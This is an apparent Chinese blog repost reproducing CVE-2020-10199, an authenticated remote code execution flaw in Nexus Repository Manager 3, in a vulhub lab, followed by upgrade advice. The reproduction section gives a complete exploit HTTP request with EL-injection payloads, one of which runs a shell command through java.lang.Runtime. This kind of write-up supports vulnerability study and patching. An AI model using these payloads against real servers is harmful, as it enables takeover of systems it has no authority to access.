码迷,mamicode.com
首页 > 其他好文 > 详细

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)复现

时间:2020-05-07 18:12:32      阅读:266      评论:0      收藏:0      [点我收藏+]

标签:xmlhttp   安全   arp   eval   环境   requested   el表达式   用户   like   

一、漏洞概要

  2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。

  Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。

  在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 

  此漏洞的利用需要攻击者具备任意类型的账号权限。

二、漏洞影响

【危险等级】

  高危

【影响版本】  

  Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

三、漏洞复现

1、环境搭建

  使用vulhub提供的漏洞环境(linux环境,安装docker下,执行docker-compose up -d 命令启动Nexus Repository Manager 3.21.1)

  等待一段时间环境才能成功启动,访问http://your-ip:8081即可看到Web页面。

  该漏洞需要至少普通用户身份,所以我们需要使用账号密码admin:admin登录后台。

2、复现

  登录后,复制当前Cookie和CSRF Token,发送如下数据包,即可执行EL表达式:

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

(1)尝试执行233*233*233,成功返回结果

技术图片

(2)尝试创建文件

 

$\\A{‘‘.getClass().forName(‘java.lang.Runtime‘).getMethods()[6].invoke(null).exec(‘touch /tmp/success‘)}

技术图片

回到漏洞环境检查,文件夹success创建成功

技术图片

 

 

(3)dnslog测试 

 技术图片

漏洞存在

技术图片

 

 

 

 

 

 POC参考:https://github.com/zhzyker/CVE-2020-10199_POC-EXP

技术图片

 

 四、漏洞修复

  目前,官方已发布新版本修复了该漏洞,请受影响的用户升级到安全版本。

  下载地址:https://help.sonatype.com/repomanager3/download/ 

   注:修复漏洞前请将资料备份,并进行充分测试。

 

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)复现

标签:xmlhttp   安全   arp   eval   环境   requested   el表达式   用户   like   

原文地址:https://www.cnblogs.com/appear001/p/12844624.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!